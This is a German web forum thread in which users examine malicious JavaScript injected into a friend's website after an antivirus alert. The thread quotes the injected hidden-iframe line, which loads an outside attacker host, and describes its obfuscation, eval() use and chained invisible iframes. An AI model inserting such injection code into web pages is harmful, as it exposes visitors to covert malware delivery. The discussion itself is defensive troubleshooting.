nicht angemeldet
Virus auf Homepage
StruppiHi,
hatte grad n Anruf von einem Bekannten, daß ein Virus auf seiner Webseite sei.
Hab nachgeschaut und der Antivir hat folgenden Virus gemeldet:
HTML/Crypted.Gen
Der Virus wird aber nicht immer gemeldet, sondern nur manchmal.
Im Quelltext hab ich dann einen Javascriptblock gefunden, in dem mittels eines Arrays, einer kryptischen Zeichenfolge und versch. Umwandlungen Javascript-Code in einen String gelegt wird, der dann mit eval() ausgeführt wird:
Zuerst wird die Statuszeile mit window.status='Done'; überschrieben, dann wird mit document.write() ein I-Frame ins Dokument eingefügt, natürlich mit style="display:none"
Der an document.write() übergebene Block lautet folgendermaßen:
'<iframe name=cee5f src="http://add-block-filter.net/t/?'+Math.round(Math.random()*18060)+'cee5f'+'" width=172 height=105 style="display:none"></iframe>'
Hab mal "add-block-filter.net" in Google eingegeben, finde aber nichts, was weiterhilft. Ergebnisliste äußerst spärlich.
Offenbar ist wohl der Webspace meines Bekannten gehackt worden.
Kann jemand genaueres oder mehr dazu sagen?
grüße
peter
-
Hi
Ich würde mal fragen von wem die Seite stammt - also wer hat den Code eingefügt?
Herzliche Grüße
Wolfgang
-
Kann jemand genaueres oder mehr dazu sagen?
Worüber? deine Infos sind mehr als dürftig.
Aber vielleicht nutzt dein Bekannter joomla.
Struppi.
-
Hallo Struppi
Worüber? deine Infos sind mehr als dürftig.
Ich weiß, aber mehr weiß ich auch erstmal nicht.
Den Ersteller der Seite (ein Freund meines Bekannten) haben wir noch nicht erreicht. Und die Zugangsdaten hat mein Bekannter auch nicht.
Wir sind aber mit Hochdruck dran.Das mit Joomla hatt ich inzwischen auch gefunden.
Hatte gedacht, daß vielleicht jemand was über add-block-filter.net weiß.
Trau mich nicht, die Seite aufzurufen.
Wird ja auch eine Zufallszahl in der Adresse mit übergeben.
Ich weiß also überhaupt nicht, was passiert oder passieren kann.Hab die Seiten mal mit ausgeschaltetem Javascript durchgeschaut.
Der Code ist auf der index.html und auf der index.html des eingebauten Webshops direkt hinter dem BODY-Tag eingebaut (ohne Leerzeichen oder sonstwas dazwischen).
Könnte darauf hinweisen, daß er automatisch auf allen index-Dateien direkt hinter einem gefundenen BODY-Tag eingefügt wurde.gruß
peter-
hi,
Hatte gedacht, daß vielleicht jemand was über add-block-filter.net weiß.
Trau mich nicht, die Seite aufzurufen.Da steht:
" Welcome ! ;) "
Das ist alles (auch das Smiley), im Quelltext steht nichts weiter.
mfg
-
Hallo
Hatte gedacht, daß vielleicht jemand was über add-block-filter.net weiß.
Trau mich nicht, die Seite aufzurufen.Da steht:
" Welcome ! ;) "
Das ist alles (auch das Smiley), im Quelltext steht nichts weiter.
Aber nur, wenn du es direkt aufrufst, ohne den Rest, der durch das Javascript generiert wird.
Ansonsten enthält das unsichtbare Iframe eine Seite, die lediglich ein unsichtbares Iframe enthält. In dieses unsichtbare Iframe wird eine Seite geladen, die (wohl zufallsgesteuert) entweder auf http://www.msn.com/ weiterleitet oder als einzigen Seiteninhalt ein Javascript enthält, welches mittels document.write und unescape wiederum zwei 1x1 Pixel große Iframe ins Dokument schreibt. Was die Scripte der damit eingebundenen Seiten dann genau tun kann ich nicht sagen.Auf Wiederlesen
Detlef--
- Wissen ist gut
- Können ist besser
- aber das Beste und Interessanteste ist der Weg dahin!
-
-
-